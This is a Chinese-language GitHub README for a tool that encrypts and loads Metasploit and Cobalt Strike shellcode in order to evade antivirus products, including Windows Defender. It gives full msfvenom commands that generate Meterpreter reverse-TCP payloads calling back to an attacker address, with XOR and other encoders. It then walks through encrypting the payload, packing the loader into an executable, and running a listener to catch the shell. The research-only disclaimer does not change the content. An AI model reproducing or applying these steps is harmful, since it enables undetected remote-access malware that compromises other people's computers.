Skip to content

Latest commit

 

History

History
128 lines (81 loc) · 3.99 KB

README.md

File metadata and controls

128 lines (81 loc) · 3.99 KB

ShellCode_Loader

ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器、Shellcode_encryption - 免杀Shellcode加密生成工具,目前测试免杀360&火绒&电脑管家&Windows Defender(其他杀软未测试)。

云沙箱 Shellcode_encryption.exe

https://s.threatbook.com/report/file/0606827425aefcc44402ce83987efbd90afefb61da29fce19591fe7e27d8f4a5

SHA256:0606827425aefcc44402ce83987efbd90afefb61da29fce19591fe7e27d8f4a5
MD5:8ad44325c56a450d1a2500daaad6fa03
SHA1:169b434cb4750e3e75079b731dc3c97caee32867

图片

声明

该项目仅供网络安全研究使用,禁止使用该项目进行违法操作,否则自行承担后果,请各位遵守《中华人民共和国网络安全法》!!! 代码未经过大量测试,如发现问题请提交 issue。

测试环境

截至2022年9月3日测试时Windows 10 可免国内杀软:火绒&360&电脑管家及Windows Defender(其他杀软自测)

Windows 7 64位 或以上操作系统应该都没问题(没有测试)

生成Msf_Payload

默认

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.30.20 lport=8899 -f c  -o  payload.c

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.30.20 lport=8899 -f py -o  payload_py.c

XOR 编码器

msfvenom -e x64/xor -p windows/x64/meterpreter/reverse_tcp lhost=192.168.30.20 lport=8899 -f c  -o  payload_xor.c

动态密钥XOR编码器

msfvenom -e x64/xor_dynamic -p windows/x64/meterpreter/reverse_tcp lhost=192.168.30.20 lport=8899 -f c  -o  payload_xor_dynamic.c

Zutto Dekiru

msfvenom -e x64/zutto_dekiru -p windows/x64/meterpreter/reverse_tcp lhost=192.168.30.20 lport=8899 -f c  -o  payload_zutto_dekiru.c

生成CobaltStrike_Payload

图片

选择使用x64的C语言或Python语言的Shellcode。

图片

得到一个payload.c的文件

内容为:

图片

加密Payload

Shellcode_encryption.exe    payload.c

图片

配置ShellCode加载器

将生成的密文ShellCode 填至 ShellCode_Loader.py 里的 Data = '密文Shellcode' 处 示例: 图片 最终格式: 图片

打包可执行程序(EXE编译环境)

Python 3.8.6

pyinstaller 4.7

pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple
pyinstaller -F -w ShellCode_Loader.py

生成ShellCode_Loader.exe在dist目录中

上线测试

运行监听

msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8080
msf6 exploit(multi/handler) > run

图片 图片 帮忙点个Star 谢谢

参考链接

https://mp.weixin.qq.com/s/M3tbE08ybD_lIrJS8FtPTw

https://mp.weixin.qq.com/s/jMHn4trtMjgdSIsRmoVOtw

https://mp.weixin.qq.com/s/2105i9rX4yv6K0emRFr8_g

https://mp.weixin.qq.com/s/VS_c3QClxmCB6raXEfljpg

https://mp.weixin.qq.com/s/4pwbdK6zz4XH7YJxCoA1Lw

感谢阅读

图片